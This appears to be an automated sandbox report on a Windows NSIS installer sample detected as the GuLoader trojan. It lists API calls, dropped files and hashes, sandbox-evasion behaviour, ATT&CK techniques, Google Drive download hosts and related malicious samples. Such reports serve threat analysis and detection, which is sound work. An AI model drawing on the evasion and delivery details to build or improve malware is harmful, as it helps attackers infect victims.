      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe File created: C:\Users\user\tranchet
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe File created: C:\Users\user\AppData\Local\Temp\nsvDC99.tmp
      Source: fbXZ4ErQMU.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: fbXZ4ErQMU.exe ReversingLabs: Detection: 60%
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe File read: C:\Users\user\Desktop\fbXZ4ErQMU.exe
      Source: unknown Process created: C:\Users\user\Desktop\fbXZ4ErQMU.exe "C:\Users\user\Desktop\fbXZ4ErQMU.exe"
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Process created: C:\Users\user\Desktop\fbXZ4ErQMU.exe "C:\Users\user\Desktop\fbXZ4ErQMU.exe"
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: edgegdi.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: oleacc.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: powrprof.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: wkscli.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: edgegdi.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: umpdc.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: schannel.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: mskeyprotect.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: ntasn1.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: msasn1.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: dpapi.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: gpapi.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: ncrypt.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Section loaded: ncryptsslp.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: Arder.lnk.0.dr LNK file: ..\Users\user\Disannex.And37
      Source: fbXZ4ErQMU.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: mshtml.pdbUGP source: fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      Source: Yara match | File source: 00000003.00000002.56492873526.000000000183F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.53292835357.0000000002C0F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | Code function: 0_2_70051A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70051A98
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | Code function: 0_2_70052F60 push eax; ret 0_2_70052F8E
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | File created: C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp\System.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | API/Special instruction interceptor: Address: 2FC20BD
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | API/Special instruction interceptor: Address: 1BF20BD
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp\System.dll
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe TID: 4220 | Thread sleep time: -280000s >= -30000s
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | Last function: Thread delayed
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | Code function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53282275495.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618375979.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058380581.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54066069249.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53624432299.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511514177.0000000006E5E000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54513141564.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53394052068.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | API call chain: ExitProcess graph end node graph_0-4007
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | API call chain: ExitProcess graph end node graph_0-4012
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | Code function: 0_2_70051A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70051A98
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | Process created: C:\Users\user\Desktop\fbXZ4ErQMU.exe "C:\Users\user\Desktop\fbXZ4ErQMU.exe"
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe | Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 11 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 System Information Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      Source | Detection | Scanner | Label | Link
      fbXZ4ErQMU.exe | 100% | Avira | TR/Injector.otkux |
      fbXZ4ErQMU.exe | 61% | ReversingLabs | Win32.Trojan.Guloader |

      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp\System.dll | 0% | ReversingLabs | |

      No Antivirus matches
      No Antivirus matches

      Source | Detection | Scanner | Label | Link
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | 0% | Avira URL Cloud | safe |
      http://www.gopher.ftp://ftp. | 0% | Avira URL Cloud | safe |
      http://nsis.sf.net/NSIS_ErrorError | 0% | Avira URL Cloud | safe |
      http://nsis.sf.net/NSIS_Error | 0% | Avira URL Cloud | safe |
      http://www.quovadis.bm0 | 0% | Avira URL Cloud | safe |
      https://ocsp.quovadisoffshore.com0 | 0% | Avira URL Cloud | safe |

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 142.250.217.238 | true | false | | high
      drive.usercontent.google.com | 142.250.64.193 | true | false | | high
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.gopher.ftp://ftp.fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://drive.google.com/ffbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057812723.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      IP | Domain | Country | ASN | ASN Name | Malicious
                                      142.250.64.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                      142.250.217.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1569258
                                      Start date and time:2024-12-05 16:58:44 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 14m 5s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                      Run name:Suspected Instruction Hammering
                                      Number of analysed new started processes analysed:5
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:fbXZ4ErQMU.exe
                                      Detection:MAL
                                      Classification:mal68.troj.evad.winEXE@3/8@2/2
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 81%
                                      • Number of executed functions: 48
                                      • Number of non-executed functions: 27
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                      • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: fbXZ4ErQMU.exe
                                      No simulations
                                      No context
                                      Match: 37f463bf4616ecd445d4a1937da06e19
                                      Associated Sample Name / URL | Detection | Threat Name | Context
                                      Y5yNja2zy3.exe | malicious | GuLoader | 142.250.64.193, 142.250.217.238
                                      DX7V71Ro7b.exe | malicious | GuLoader, Snake Keylogger | 142.250.64.193, 142.250.217.238
                                      upx_rufus.exe | malicious | Unknown | 142.250.64.193, 142.250.217.238
                                      dIPYIbWXs1.exe | malicious | GuLoader | 142.250.64.193, 142.250.217.238
                                      sNifdpWiY9.exe | malicious | Metasploit, Meterpreter | 142.250.64.193, 142.250.217.238
                                      payload_1.vbs | malicious | GuLoader, RHADAMANTHYS | 142.250.64.193, 142.250.217.238
                                      List of Required items xlsx.vbs | malicious | GuLoader, RHADAMANTHYS | 142.250.64.193, 142.250.217.238
                                      ab.vbs | malicious | GuLoader, RHADAMANTHYS | 142.250.64.193, 142.250.217.238
                                      REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 142.250.64.193, 142.250.217.238
                                      Match: C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp\System.dll
                                      Associated Sample Name / URL | Detection | Threat Name
                                      dIPYIbWXs1.exe | malicious | Unknown
                                      dIPYIbWXs1.exe | malicious | GuLoader
                                      eAvqHiIsgR.exe | malicious | GuLoader
                                      eAvqHiIsgR.exe | malicious | GuLoader
                                      RFQ-24064562-SUPPLY-NOv-ORDER.com.exe | malicious | Remcos, GuLoader
                                      LkzvfB4VFj.exe | malicious | FormBook, GuLoader
                                      LkzvfB4VFj.exe | malicious | GuLoader
                                      z120X20SO__UK__EKMELAMA.exe | malicious | GuLoader, Remcos
                                      Quotation-GINC-19-00204.exe | malicious | GuLoader, Snake Keylogger
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):5.854450882766351
                                                        Encrypted:false
                                                        SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
                                                        MD5:34442E1E0C2870341DF55E1B7B3CCCDC
                                                        SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
                                                        SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
                                                        SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: dIPYIbWXs1.exe, Detection: malicious
                                                        • Filename: dIPYIbWXs1.exe, Detection: malicious
                                                        • Filename: eAvqHiIsgR.exe, Detection: malicious
                                                        • Filename: eAvqHiIsgR.exe, Detection: malicious
                                                        • Filename: RFQ-24064562-SUPPLY-NOv-ORDER.com.exe, Detection: malicious
                                                        • Filename: LkzvfB4VFj.exe, Detection: malicious
                                                        • Filename: LkzvfB4VFj.exe, Detection: malicious
                                                        • Filename: z120X20SO__UK__EKMELAMA.exe, Detection: malicious
                                                        • Filename: Quotation-GINC-19-00204.exe, Detection: malicious
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):455584
                                                        Entropy (8bit):2.656352367412479
                                                        Encrypted:false
                                                        SSDEEP:3072:ONKMH32ik+9vLI8uCpKGo+JpkP5rGopqtbuUf5j60:Oh32ik+9vXHpK5+JpkBrG+6buUf5j60
                                                        MD5:23117B3934A86E8695598259FB457193
                                                        SHA1:A93A91497D007EC9FEB500D6022272BE025A0CEF
                                                        SHA-256:7C0F10CFF86EA22DBF210D01EF43CB7C5BB6BF4ABAC18151D1D70FEC485FA8A4
                                                        SHA-512:6D89701A2A6E1D2089EA7EDA900D0F708F18BF419B048B6C4CCB2598D01C593FF7249E44C4B9C96F499EDF8E860A6D7D177D51817D091B410FE68C107E13B044
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):229378
                                                        Entropy (8bit):7.492569922983724
                                                        Encrypted:false
                                                        SSDEEP:3072:Tq6BlW6gYV7fcXEjHoHv/0TQPEQjtZoL9VWToGyQV6U7HTehRHsWL83:TqslW6LV7UXSoPsbQjtkFGTeUl3
                                                        MD5:BB8D669BD88B3093874F7BF94B0D5746
                                                        SHA1:CAA0D57B29D39044BD4D003086D370F6666A8F5A
                                                        SHA-256:E7911C7E36701424FB672BE8FDB7E13F66197E1B14841740A24821B98CB1D510
                                                        SHA-512:E959EB6F2A45146DF2BFD26618A5A6567DCFE4B43643637B5429E5BED24112D340B42DD2CCC2A5BB2D95C6F862A7AF68079AD77E9B6672257B9EED39C8BD91F6
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):485127
                                                        Entropy (8bit):1.2565961974341746
                                                        Encrypted:false
                                                        SSDEEP:768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
                                                        MD5:580D05E679E74B036B55CA8E5FF32769
                                                        SHA1:10175C43AB7B725FFFCF770EB2C3555E91D3BA13
                                                        SHA-256:B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
                                                        SHA-512:0E26F0084BED372785A5E8C8BE3A0717074AA52C2E8B5413FA9F2CB8DEED40BF8BDBF15C411EFFA432A8B96E50AE6085E8F90A97350827AFAA1BE1AB4B3E1643
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):389868
                                                        Entropy (8bit):1.2469892412772452
                                                        Encrypted:false
                                                        SSDEEP:768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
                                                        MD5:2A500E1219C4894E2D45C32C5A5A11FD
                                                        SHA1:AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
                                                        SHA-256:C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
                                                        SHA-512:89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):442363
                                                        Entropy (8bit):1.2533707838755617
                                                        Encrypted:false
                                                        SSDEEP:1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
                                                        MD5:5465B75724C031B21C018F7D72941F72
                                                        SHA1:98176B27A41A35401A96D0AAC0859EEC25A4C5FE
                                                        SHA-256:7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
                                                        SHA-512:7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):521
                                                        Entropy (8bit):4.284169749449499
                                                        Encrypted:false
                                                        SSDEEP:12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
                                                        MD5:B089BD0CBC944DE0B1023E6CE9318BD3
                                                        SHA1:715FA74E243D5C3419519E7371ED1836C9BCFA4A
                                                        SHA-256:1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
                                                        SHA-512:A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
                                                        Malicious:false
                                                        Preview:dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                        Category:dropped
                                                        Size (bytes):734
                                                        Entropy (8bit):3.2819121006350698
                                                        Encrypted:false
                                                        SSDEEP:12:8wl01sXUCTGlnEEqEu3w/g/rNJkKAh4t2YCBTo8:82svqo/45HALJT
                                                        MD5:77093B00B23F98CBA6C0D1C948350193
                                                        SHA1:D8DB917CC95435D80B446AA38B623377B39D9E18
                                                        SHA-256:ABEC3A36956C827AE67D077F005B6CEAA616B58A4BE7202DEAC7058936AE8042
                                                        SHA-512:FB8659401E24C2445B4718338E6FDEBD55A0CD2A783EAB278845582E959A2CB03E06C1D30E8144998819A8DA71129B4E58D1395122E4988E08EC71F6CF6B9D92
                                                        Malicious:false
                                                        Preview:L..................F........................................................?....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....l.2...........Disannex.And37..N............................................D.i.s.a.n.n.e.x...A.n.d.3.7.............\.U.s.e.r.s.\.A.r.t.h.u.r.\.D.i.s.a.n.n.e.x...A.n.d.3.7.$.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.t.r.a.n.c.h.e.t.\.T.r.y.k.m.a.a.l.e.r.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.5537524720559555
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:fbXZ4ErQMU.exe
                                                        File size:901'168 bytes
                                                        MD5:c58b26e27e2d9aa8080e289445e1c8ca
                                                        SHA1:50dc9a8d9735a94a18cf3b35cb3c88217b3d05cd
                                                        SHA256:9201c98d765025cad9fcbe9095c1f34960b641d38c6a4e999720a0c3c129353f
